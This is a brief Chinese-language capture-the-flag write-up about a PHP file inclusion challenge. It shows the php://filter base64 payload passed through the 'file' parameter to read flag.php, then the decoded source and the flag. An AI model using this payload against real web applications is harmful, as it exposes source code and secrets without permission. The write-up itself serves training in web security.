通过抓包得:
页面请求数据包中,带有关键参数file
,传递的是一个php
文件名,可以猜到flag
存在于flag.php
文件中,此时很容易想到文件包含漏洞,故利用url
封装协议来构造payload
:?file = php://filter/convert.base64-encode/resource=flag.php
,以base64
编码的格式来读取该文件的内容,得到一串base64
编码:
然后将该编码解码得:
<?php
echo "Can you find out the flag?";
//flag{14d57cea-b6c8-409f-8161-b11be4642b49}